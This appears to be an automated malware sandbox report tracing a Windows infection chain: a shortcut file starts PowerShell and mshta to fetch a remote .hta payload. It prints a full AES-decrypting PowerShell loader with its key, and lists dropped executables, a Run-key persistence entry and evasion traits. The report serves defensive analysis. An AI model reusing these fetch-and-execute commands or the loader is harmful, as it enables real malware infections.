                    Source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, wrQqF835PFmCSFtGtO.cs.Net Code: Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777263)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777238)),Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777265))})
                    Source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, wrQqF835PFmCSFtGtO.cs.Net Code: Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777263)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777238)),Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777265))})
                    Source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, wrQqF835PFmCSFtGtO.cs.Net Code: Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777263)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777238)),Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777265))})
                    Source: 23.2.bwsiuvcU.pif.3ede6478.5.raw.unpack, wrQqF835PFmCSFtGtO.cs.Net Code: Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777263)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777238)),Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777265))})
                    Source: 23.2.bwsiuvcU.pif.409c0000.8.raw.unpack, wrQqF835PFmCSFtGtO.cs.Net Code: Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777263)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777238)),Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777265))})
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.Tra
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = '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';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -
                    Source: bwsiuvcU.pif.19.drStatic PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_02997AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,19_2_02997AC0
                    Source: easinvoker.exe.19.drStatic PE information: section name: .imrsiv
                    Source: netutils.dll.19.drStatic PE information: section name: .xdata
                    Source: netutils.dll.19.drStatic PE information: section name: /4
                    Source: netutils.dll.19.drStatic PE information: section name: /19
                    Source: netutils.dll.19.drStatic PE information: section name: /31
                    Source: netutils.dll.19.drStatic PE information: section name: /45
                    Source: netutils.dll.19.drStatic PE information: section name: /57
                    Source: netutils.dll.19.drStatic PE information: section name: /70
                    Source: netutils.dll.19.drStatic PE information: section name: /81
                    Source: netutils.dll.19.drStatic PE information: section name: /92
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAAB95FB5D push esp; retf 17_2_00007FFAAB95FB5E
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAAB958167 push ebx; ret 17_2_00007FFAAB95816A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAAB9584E1 push es; ret 17_2_00007FFAAB9584E2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAAB950CCE pushad ; retf 17_2_00007FFAAB950D3D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAABA244B4 push cs; ret 17_2_00007FFAABA244B6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFAABA2433D push cs; ret 17_2_00007FFAABA2433F
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFAABA24390 push cs; ret 17_2_00007FFAABA24392
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFAABA242E8 push cs; ret 17_2_00007FFAABA242EA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFAABA24209 push cs; ret 17_2_00007FFAABA24232
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFAABA2914E push ss; ret 17_2_00007FFAABA2914F
                    Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_029832F0 push eax; ret 19_2_0298332C
                    Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_029AA2F4 push 029AA35Fh; ret 19_2_029AA357
                    Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_0299D20C push ecx; mov dword ptr [esp], edx 19_2_0299D211
                    Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_02986372 push 029863CFh; ret 19_2_029863C7
                    Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_02986374 push 029863CFh; ret 19_2_029863C7
                    Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_029AA0AC push 029AA125h; ret 19_2_029AA11D
                    Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_02993028 push 02993075h; ret 19_2_0299306D
                    Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_02993027 push 02993075h; ret 19_2_0299306D
                    Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_029AA1F8 push 029AA288h; ret 19_2_029AA280
                    Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_029AA144 push 029AA1ECh; ret 19_2_029AA1E4
                    Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_0298673E push 02986782h; ret 19_2_0298677A
                    Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_02986740 push 02986782h; ret 19_2_0298677A
                    Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_0298C528 push ecx; mov dword ptr [esp], edx 19_2_0298C52D
                    Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_0298D55C push 0298D588h; ret 19_2_0298D580
                    Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_0298CBA8 push 0298CD2Eh; ret 19_2_0298CD26
                    Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_02999B58 push 02999B90h; ret 19_2_02999B88
                    Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_029A9B70 push 029A9D8Eh; ret 19_2_029A9D86
                    Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_0298C8D6 push 0298CD2Eh; ret 19_2_0298CD26
                    Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_029978C8 push 02997945h; ret 19_2_0299793D
                    Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_02996902 push 029969AFh; ret 19_2_029969A7
                    Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_02996904 push 029969AFh; ret 19_2_029969A7
                    Source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, wrQqF835PFmCSFtGtO.cs High entropy of concatenated method names: 'ICAyBoI8nQ', 'KDikMXewCI', 'L8eyiSD8RZ', 'NWhy3UvHJp', 'hrcyqFProH', 'xbkytiDasQ', 'cE1voes021ZUN', 'ErtcfHgK7I', 'NFQcC8bA4F', 'TE6czWL5Zk'
                    Source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, wrQqF835PFmCSFtGtO.cs High entropy of concatenated method names: 'ICAyBoI8nQ', 'KDikMXewCI', 'L8eyiSD8RZ', 'NWhy3UvHJp', 'hrcyqFProH', 'xbkytiDasQ', 'cE1voes021ZUN', 'ErtcfHgK7I', 'NFQcC8bA4F', 'TE6czWL5Zk'
                    Source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, wrQqF835PFmCSFtGtO.cs High entropy of concatenated method names: 'ICAyBoI8nQ', 'KDikMXewCI', 'L8eyiSD8RZ', 'NWhy3UvHJp', 'hrcyqFProH', 'xbkytiDasQ', 'cE1voes021ZUN', 'ErtcfHgK7I', 'NFQcC8bA4F', 'TE6czWL5Zk'
                    Source: 23.2.bwsiuvcU.pif.3ede6478.5.raw.unpack, wrQqF835PFmCSFtGtO.cs High entropy of concatenated method names: 'ICAyBoI8nQ', 'KDikMXewCI', 'L8eyiSD8RZ', 'NWhy3UvHJp', 'hrcyqFProH', 'xbkytiDasQ', 'cE1voes021ZUN', 'ErtcfHgK7I', 'NFQcC8bA4F', 'TE6czWL5Zk'
                    Source: 23.2.bwsiuvcU.pif.409c0000.8.raw.unpack, wrQqF835PFmCSFtGtO.cs High entropy of concatenated method names: 'ICAyBoI8nQ', 'KDikMXewCI', 'L8eyiSD8RZ', 'NWhy3UvHJp', 'hrcyqFProH', 'xbkytiDasQ', 'cE1voes021ZUN', 'ErtcfHgK7I', 'NFQcC8bA4F', 'TE6czWL5Zk'

                    Persistence and Installation Behavior

                    Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: LNK file Process created: C:\Windows\System32\mshta.exe
                    Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: LNK file Process created: C:\Windows\SysWOW64\cmd.exe
                    Source: C:\Users\user\AppData\Roaming\uc.exe File created: C:\Users\Public\Libraries\bwsiuvcU.pif
                    Source: C:\Windows\SysWOW64\extrac32.exe File created: C:\Users\Public\Libraries\Ucvuiswb.PIF
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\uc.exe
                    Source: C:\Users\user\AppData\Roaming\uc.exe File created: C:\Users\Public\Libraries\easinvoker.exe
                    Source: C:\Users\user\AppData\Roaming\uc.exe File created: C:\Users\Public\Libraries\netutils.dll
                    Source: C:\Users\user\AppData\Roaming\uc.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Ucvuiswb
                    Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_02999B94 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 19_2_02999B94
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exe, Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif, Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIF; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Memory allocated: 3D940000 memory reserve | memory write watch
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Memory allocated: 3DDE0000 memory reserve | memory write watch
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Memory allocated: 3DD00000 memory reserve | memory write watch
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Memory allocated: 25B80000 memory reserve | memory write watch
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Memory allocated: 25F70000 memory reserve | memory write watch
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Memory allocated: 27F70000 memory reserve | memory write watch
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Memory allocated: 3D900000 memory reserve | memory write watch
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Memory allocated: 3DD30000 memory reserve | memory write watch
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Memory allocated: 3FD30000 memory reserve | memory write watch
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Code function: 23_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 17_2_00007FFAABA20F6D sldt word ptr [eax]
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 922337203685477
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1200000
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1199809
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1199687
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1199305
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1199172
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1197547
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1197435
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1197328
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1197219
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1197109
